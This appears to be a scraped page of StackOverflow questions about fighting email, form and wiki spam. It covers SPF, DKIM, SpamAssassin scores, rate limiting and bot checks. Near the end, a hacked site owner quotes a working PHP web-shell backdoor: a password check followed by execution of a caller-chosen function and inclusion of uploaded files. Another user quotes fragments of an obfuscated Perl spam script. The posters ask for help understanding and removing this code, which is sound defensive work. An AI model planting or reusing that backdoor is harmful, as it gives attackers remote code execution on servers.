spam interview questions
Top spam frequently asked interview questions
On my homepage, I'm using this method to hide my email from spam bots:
<a rel='nofollow' href="admin [at] example.com"
rel="nofollow"
onclick="this.rel='nofollow' href='mailto:' + 'admin' + '@' + 'example.com'">Contact me</a>
What do you think about it? Is it effective? What other methods do you know or use?
Source: (StackOverflow)
Suppose we have an application that acts as a middleman, allowing Company A to send reports to their customers.
Company A --> Company B (me)--> Company A's customers
After getting the report we send email notifications to the recipients, but they necessarily originate from our company notifications email address e.g.
joe.bloggs@a.com --> notifications@b.com --> peter@c.com
Now, customers tend to reply to those email notifications, wanting them to go back to whoever sent the report at Company A. Instead, they end up back at our address, notifications@b.com.
A simple solution may be to change the Reply-To header on the notifications we send to the relevant Company A address e.g.
joe.bloggs@a.com --> notifications@b.com [Reply-To: joe.bloggs@a.com] --> peter@c.com
But my main concerns are:
- the complete discrepancy in email address and domain between the From and Reply-To fields might make spam or phishing filters more eager to flag the emails
- not all email clients may respect the Reply-To field when people actually click "Reply", and just use From instead. A lesser concern, unless widespread.
Are these concerns founded at all? Or, are there other concerns I should have?
Source: (StackOverflow)
There is a growing trend to use port 587 for all client to MTA communications. It's in a standards track RFC: http://www.ietf.org/rfc/rfc2476.txt
My question is "Why?". Why have 2 instances of a SMTP server running on the same server, if they both do the same thing? What security feature does it provide, besides giving me 2 things to troubleshoot as an administrator.
This just seems like unnecessary complication that isn't needed unless the ISP blocks port 25. Even then, if the ISP is blocking port 25 to prevent spam, it just means it will just take a little more time until port 587 is blocked too, and we will have to use a different port altogether.
Just seems like we are creating more work for ourselves rather then solving the problem and authenticating SMTP to begin with
Source: (StackOverflow)
Whenever I use PHP to send emails to members of my site, the email ends up in the spam folder for most email providers like Gmail and Hotmail.
When I check the original source in Gmail, I see the following:
Delivered-To: mypersonalmail@gmail.com
Received: by 10.236.41.34 with SMTP id g22cs272510yhb;
Wed, 1 Jun 2011 05:38:27 -0700 (PDT)
Received: by 10.236.77.102 with SMTP id c66mr7228248yhe.303.1306931907131;
Wed, 01 Jun 2011 05:38:27 -0700 (PDT)
Received-SPF: softfail (google.com: best guess record for domain of transitioning info@mywebserver.com does not designate as permitted sender)
Received: by 10.190.5.195 with POP3 id 3mf1156376yxt.72;
Wed, 01 Jun 2011 05:38:27 -0700 (PDT)
X-Gmail-Fetch-Info: info@mywebserver.com 14 mail.mywebserver.com 110 info@mywebserver.com
Return-path:
Envelope-to: info@mywebserver.com
Received: from mybestsh by s01.next-web.nl with local (Exim 4.69)
(envelope-from )
id 1QRkgT-0000BF-3v
for info@mywebserver.com; Wed, 01 Jun 2011 14:38:01 +0200
To: info@mywebserver.com
Subject: Your new password
MIME-Version: 1.0
From: MyServer
Reply-To: MyServer
X-Sender: MyServer
I have set up my SPF records as follows:
v=spf1 a mx ip4:xxx.xxx.xx.xx-all
I am wondering what causes the softfail. Any ideas?
Best regards,
Rick
Source: (StackOverflow)
I want to check the SpamAssassin SPAM score of E-Mails including headers generated by a script from a WebApp.
Therefore I need to run this mail through SpamAssassin to get the specific SPAM headers like:
Yes, score=6.032
HTML_IMAGE_ONLY_24=1.282
HTML_MESSAGE=0.001
HTML_MIME_NO_HTML_TAG=0.635
MIME_HEADER_CTYPE_ONLY=1.996
MIME_HTML_ONLY=1.105
RP_MATCHES_RCVD=-0.001
SPF_PASS=-0.001
SUBJECT_NEEDS_ENCODING=0.1
SUBJ_ILLEGAL_CHARS=1.105
T_REMOTE_IMAGE=0.01
One possibility could be to install SpamAssassin on the server and run it through this installation.
Is there some online service where I can paste/send the mail to and this service gives me the SPAM headers?
Yes, I know that you can configure SpamAssassin with different settings and therefore the SPAM score may vary from installation to installation, but a basic evaluation would help already.
Or is there a possibility to check the RFC conformance of a message? (Because SpamAssassin also evaluates this (eg. MIME_HTML_ONLY which means that you have no plain text content and therefore the mail isn't RFC conformant)).
Thanks!!
Source: (StackOverflow)
We have a business web application that periodically sends emails as reminders, links to client data, etc. Our company uses Google Apps for our email provider (with our own domain name), and the web application sends email through Google with SMTP.
The problem is that Google Apps / Gmail keeps marking the messages as spam, even for the inboxes in our domain name. No other email provider seems to mark it as spam (but of course we haven't tested them all...).
We've tried various formulations of the body test: i.e. including more contextual information, addressing the recipient by name, but so far with no apparent changes. This makes me thing it may be something about our email sending process, rather than the content of the email, that's causing the emails to be marked as spam.
Things that we tried but that didn't solve the problem:
- "From" address is valid and not spoofed
- SPF records are correct, and show as "pass" in the email header
- Since we are connecting to Google's SMTP server to send email, it's not an issue with a blacklisted IP address (however, our website has a static IP address that is not blacklisted).
- Email is not very spammy: I've checked against several online spam filter tests, and the email body always shows up as extremely unlikely to be filtered.
- HTML body vs plain-text body seems to make no difference.
- We send a small volume of email: probably 0-10 emails per day, so I don't see how that would make this suspicious.
- Whenever we have access to the receiving inbox (i.e. it belongs to an employee of our company), we've been marking the emails as "not spam", since Gmail may be using communal statistics to determine spam. After a couple times this results in emails to that particular inbox getting through, but doesn't seem to help other accounts.
What else can we try?
If it makes a difference, we're sending emails using an ASP.NET site running .NET 3.5. A typical email gets sent like this:
var message = new MailMessage(new MailAddress(from), new MailAddress(to)) {
Subject = subject,
Body = body
IsBodyHtml = true
};
// SMTP details stored in web.config
new SmtpClient { EnableSsl = true }.SendAsync(message, null);
EDIT:
I've seen this similar question: How to stop Gmail from marking mails sent by my web app as spam?, but the situation is a little different since we can reproduce it by sending and receiving from the same Google Apps domain. Besides, I believe I have covered all of the proposed solutions for that question.
Source: (StackOverflow)
Since it was released I've been using Google Apps FYD for stackednotion.com. All of the email I send goes through Google's servers and I use Gmail to view my email. I haven't had any issues before, however recently I've been seeing weird bouncebacks ending up in the catch all account. It looks like somebody is using my domain to send spam. I don't really want my domain getting marked with a bad reputation, so how can I stop this?
I have setup SPF, DMARC and DKIM on the domain by following the guides on Google Apps, here is my zone file:
; stackednotion.com [9548]
$TTL 86400
@ IN SOA ns1.linode.com. luca.stackednotion.com. 2012072633 7200 7200 1209600 86400
@ NS ns1.linode.com.
@ NS ns2.linode.com.
@ NS ns3.linode.com.
@ NS ns4.linode.com.
@ NS ns5.linode.com.
@ MX 1 ASPMX.L.GOOGLE.COM.
@ MX 5 ALT1.ASPMX.L.GOOGLE.COM.
@ MX 5 ALT2.ASPMX.L.GOOGLE.COM.
@ MX 10 ASPMX2.GOOGLEMAIL.COM.
@ MX 10 ASPMX3.GOOGLEMAIL.COM.
@ MX 30 ASPMX4.GOOGLEMAIL.COM.
@ MX 30 ASPMX5.GOOGLEMAIL.COM.
@ TXT "v=spf1 include:_spf.google.com ~all"
google._domainkey TXT "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDi19ipSdqDEpnJEWrVF7MarSLnlzXi0wPOHws2BY6oMQInbY5OHzdw9LcFr1biVvipErm4odyJfjZAIp5s8r6z50ZxQdW5Uwdy9krA1A9HMPaqVN+fm2xpntU//uXn0wD8sGc9CljYQIl+MusxQ690PfVGnAz/QeLqaZFxpHHmmQIDAQAB"
_dmarc TXT "v=DMARC1; p=quarantine; rua=mailto:dmarc@stackednotion.com"
@ A 178.79.164.64
* A 178.79.164.64
_xmpp-server._tcp SRV 5 0 5269 xmpp-server.l.google.com.
_xmpp-server._tcp SRV 20 0 5269 alt1.xmpp-server.l.google.com.
Also here are the headers of a spam message (somebody tried to susbscribe me to a Zend mailing list, what kind of sick people are they?!?):
Return-Path: <F776387@stackednotion.com>
Received: (qmail 20117 invoked from network); 27 Jul 2012 06:51:01 -0000
Received: from exprod7mx200.postini.com (HELO psmtp.com) (64.18.2.92)
by rsmx2.zend.com with SMTP; 27 Jul 2012 06:51:01 -0000
Received: from source ([188.51.41.223]) by exprod7mx200.postini.com ([64.18.6.13]) with SMTP;
Fri, 27 Jul 2012 02:51:00 EDT
To: <fw-docs-subscribe@lists.zend.com>
Subject: Invoice #48469883494
From: "Order" <F776387@stackednotion.com>
Date: Sat, 28 Jul 2012 09:40:03 +0300
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: IPS PHP Mailer
MIME-Version: 1.0
Content-type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Message-ID: <20120728094003.9312B884F9D66F02CE7C@DELL-PC>
X-pstn-neptune: 500/484/0.97/100
X-pstn-levels: (S: 0.00346/89.11253 CV:99.9000 FC:95.5390 LC:95.5390 R:95.9108 P:95.9108 M:97.0282 C:98.6951 )
X-pstn-dkim: 0 skipp
Source: (StackOverflow)
I'm trying to figure out a good way to prevent bots from submitting my form, while keeping the process simple. I've read several great ideas, but I thought about adding a confirm option when the form is submitted. The user clicks submit and a Javascript confirm prompt pops up which requires user interaction.
Would this prevent bots or could a bot figure this out too easy? Below is the code and JSFIddle to demonstrate my idea:
JSFIDDLE
$('button').click(function () {
if(Confirm()) {
alert('Form submitted');
/* perform a $.post() to php */
}
else {
alert('Form not submitted');
}
});
function Confirm() {
var _question = confirm('Are you sure about this?');
var _response = (_question) ? true : false;
return _response;
}
Source: (StackOverflow)
Hey everyone, I run an image hosting website and I'm designing an API for it. My concern is that I don't want anyone to be able to do something like:
while(true) {
Upload();
}
and spam/DoS the site.
My current solution is to limit all IP addresses to a certain amount of uploads per day/hour. I believe this will work fine for desktop applications that will use the API, but for websites that wish to use it, all the users will have the same IP (the server's).
I suppose the best solution would be to have user accounts that authenticate with the API, and then ban each account if they abuse it. The problem with this is that my site has no user accounts at all, it's all completely anonymous.
What else can be done? I would like to keep things as open as possible, while at the same time have the ability to ban users/IPs who are obviously abusing the service.
Source: (StackOverflow)
I'm actually working on a PHP project that will feature a user system (Login,Register,Send lost password to email,..) and I think that this may be very vulnerable to Brute-Force attacks and/or Spam (Send a password to someone's email like 1000 times, etc. use your fantasy)
.
- Do today's webservers (Apache, IIS) have some sort of built-in defense against Brute-Force?
What would be the best way to implement an Anti-Spam/Flood system, if I e.g.: want a page not be able to be called more than two times a minute, however another page may be called up to 100 times a minute or so.
I would definitely have to store IP adresses, the time when they last visited a page and the number of visits somewhere - but would it be efficient enough storing it in a text-file/database (MySQL)
Should I use captchas for things like registering/recovering lost passwords?
Are "text" captchas viable? (Something like "What is 5 plus 9 minus 2? ")
The page won't be used by that many users (100-200), do I actually have to implement all these things?
Source: (StackOverflow)
I am sending a new logon and password to a user, however when I do on a test version of our site on the internet the Spam score is 4.6 by spam assassin. Which means it gets trapped.
The Email is HTML (so the marketing dept have their nice fonts and colours) with a linked image.
The MailMessage() object does not appear to give me a lot of control over the output format of the message.
What measures could I take to lower the spam score?
I am sending using this:
/* send an email */
MailMessage msg = new MailMessage();
msg.IsBodyHtml = true;
//msg.BodyEncoding = Encoding.UTF8;
msg.To.Add(new MailAddress(sToEmail));
msg.From = new MailAddress(sFromEmail);
msg.Subject = sEmailSubject;
msg.Body = sEmailTemplate;
try
{
client.Send(msg);
}
The spam score is this:
X-Spam-Score: 4.6 (++++)
X-Spam-Report: Spam detection software report (4.6 points):
pts rule name description
---- ---------------------- --------------------------------------------------
1.8 HTML_IMAGE_ONLY_20 BODY: HTML: images with 1600-2000 bytes of words
0.0 HTML_MESSAGE BODY: HTML included in message
1.7 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
1.1 HTML_MIME_NO_HTML_TAG HTML-only message, but there is no HTML tag
0.1 RDNS_NONE Delivered to trusted network by a host with no rDNS
Source: (StackOverflow)
my mediawiki site is currently under the spammers attack. I get around 10 spam pages registered daily.
What I've I already done:
- Only users with confirmed emails can create/edit pages.
- ReCAPTCHA widget (http://www.mediawiki.org/wiki/Extension:ConfirmEdit#ReCaptcha).
Captcha displayed on the actions:
a) 'edit' - triggered on every attempted page save
b) 'create' - triggered on page creation
c) 'addurl' - triggered on a page save that would add one or more URLs to the page
d) 'createaccount' - triggered on creation of a new account
- Proxy blocker
- SpamBlacklist
What else should I add in order to stop it?
I'm wondering, is it a real persons register all these spam pages or it done by bots? Not sure that the ReCAPTCHA already hacked and can be tricked by bot... am I wrong? Every spam page on my wiki registered under the new User's account. So, it's necessary to register new account, fill the ReCaptcha, confirm email and only after that register spam page. Is it possible to do all these steps automatically?
thanks in advance for any suggestions,
Alex
Source: (StackOverflow)
I was hacked, and apparently they were sending spam emails. There were two files that they injected into my server (that were duplicated across all sub-directories). One is a heavily hashed PHP file that may be the sender. The code below is from the other file.
Here's my question -- What is this accomplishing? I can't translate its purpose. Also, what should I do to avoid allowing this to happen again?
<?php
if(@md5($_POST['pass'])!=='692e3f52ee6f16bc78fa6e1ec4bd4a6a')
die();
@extract($_POST);
if(!empty($a))
@$a($b);
if(!empty($_FILES['tmp_name']))
@include($_FILES['tmp_name']);
?>
Source: (StackOverflow)
Had some spam issues on my server and, after finding out and removing some Perl and PHP scripts I'm down to checking what they really do, although I'm a senior PHP programmer I have little experience with Perl, can anyone give me a hand with the script here:
http://pastebin.com/MKiN8ifp
(It was one long line of code, script was called list.pl)
The start of the script is:
$??s:;s:s;;$?::s;(.*); ]="&\%[=.*.,-))'-,-#-*.).<.'.+-<-~-#,~-.-,.+,~-{-,.<'`.{'`'<-<--):)++,+#,-.{).+,,~+{+,,<)..})<.{.)-,.+.,.)-#):)++,+#,-.{).+,,~+{+,,<)..})<*{.}'`'<-<--):)++,+#,-.{).+:,+,+,',~+*+~+~+{+<+,)..})<'`'<.{'`'<'<-}.<)'+'.:*}.*.'-|-<.+):)~*{)~)|)++,+#,-.{).+:,+,+,',~+*+~+~+{+<+,)..})
It continues with precious few non-punctuation characters until the very end:
0-9\;\\_rs}&a-h;;s;(.*);$_;see;
Source: (StackOverflow)